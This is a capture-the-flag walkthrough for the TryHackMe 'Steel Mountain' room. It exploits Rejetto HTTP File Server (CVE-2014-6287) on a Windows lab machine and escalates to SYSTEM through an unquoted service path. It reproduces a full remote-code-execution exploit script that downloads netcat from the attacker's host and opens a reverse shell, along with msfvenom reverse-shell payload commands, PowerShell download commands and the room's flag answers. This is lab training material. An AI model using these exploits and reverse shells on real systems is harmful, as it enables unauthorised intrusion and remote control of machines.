-
Notifications
You must be signed in to change notification settings - Fork 0
/
Steel Mountain
185 lines (148 loc) · 6.68 KB
/
Steel Mountain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
#Task 1 Introduction
In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
If you don't have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
-Who is the employee of the month?
hint: http://10.10.79.133/ --->view source
Bill Harper
#Task 2 Initial Access
- Scan the machine with nmap. What is the other port running a web server on?
hint: nmap -sSVC -Pn -vv $IP
8080
- Take a look at the other web server. What file server is running?
hint: googling http file server 2.3
Rejetto Http File Server
- What is the CVE number to exploit this file server?
hint: search Rejetto on exploit-db.com
2014-6287
- Use Metasploit to get an initial shell. What is the user flag?
hint:
msf6>search rejetto
msf6>use exploit/windows/http/rejetto_hfs_exec
set lhost 10.6.88.227
set rhosts 10.10.79.133
set rport 8080
exploit
meterpreter>shell
cd c:\User\bill\Desktop
more user.txt
b04763b6fcf51fcd7c13abc7db4fd365
git clone https://github.com/PowerShellMafia/PowerSploit
cd PowerSploit/Privis
upload PowerUp.ps1
Invoke-AllChecks
- Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
AdvancedSystemCareService9
- What is the root flag?
hint: On mymachine
msfvenom -p windows/shell_reverse_tcp LHOST=10.6.88.227 LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe
mv Advanced.exe ASCService.exe
On other my machine
nc -lnvp 4443
meterpreter>shell
c:\sc stop AdvancedSystemCareService9
Ctrl+Z
meterpreter>cd "C:\Program Files (x86)\IObit\Advanced SystemCare>"
meterpreter>upload ASCservice.exe
meterpreter>shell
sc start AdvancedSystemCareService9
c:\windows\system32\
whoami
nt authority\system
cd c:\Users\Administrator\Desktop
more root.txt
9af5f314f57607c00fd09803a587db80
#Task 4 Access and Escalation Without Metasploit
Access and Escalation (without Metasploit)
https://www.exploit-db.com/exploits/39161
https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASx86.exe
On my machine
run https://www.exploit-db.com/exploits/39161
vi exploit.py
####
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib2
import sys
try:
def script_create():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
def execute_script():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
def nc_run():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
ip_addr = "myip" #local IP address
local_port = "1443" # Local Port number
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
save= "save|" + vbs
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe= "exec|"+vbs2
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1= "exec|"+vbs3
script_create()
execute_script()
nc_run()
except:
print """[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script"""
####
view code .... see nc.exe
wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
unzip netcat-win32-1.11.zip
cd netcat-win32-1.11
cp nc.exe ../
nc -lnvp 1443
On other terminal
run python3 -m http.server 80
On other terminal
run python exploit.py iptarget 8080
return nc -lnvp 1443
c:\C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
cd c:\Users\bill\Desktop
more user.txt
b04763b6fcf51fcd7c13abc7db4fd365
On my machine wget https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASx86.exe
msfvenom -p windows/shell_reverse_tcp LHOST=myip LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
- What powershell -c command could we run to manually find out the service name?
hint: google "What powershell -c command could we run to manually find out the service name?" not quotes
on target machine
powershell -c wget "http://10.6.88.227/winPEASx86.exe" -outfile "winPEASx86.exe"
powershell -c wget "http://10.6.88.227/ASCService.exe" -outfile "ASCService.exe"
powershell -c "Get-Service"
- Once this command runs, you will see you gain a shell as Administrator on our listener!
on target machine
winPEASx86.exe
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
on other terminal my machine
nc -lnvp 4443
c:\windows\system32
whoami
nt authority\system
more c:\Users\Administrator\Desktop>root.txt
9af5f314f57607c00fd09803a587db80
no answer
https://tryhackme.com/room/steelmountain
https://blog.razrsec.uk/steel-mountain-walkthrough/
https://www.aldeid.com/wiki/TryHackMe-Steel-Mountain
https://www.thedutchhacker.com/steel-mountain-on-tryhackme/
https://0n3z3r0n3.medium.com/tryhackme-steel-mountain-617bc052cabd
https://jinshiranai.hashnode.dev/tryhackme-steel-mountain
https://itsecuritydz.wordpress.com/2021/03/28/tryhackme-steel-mountain/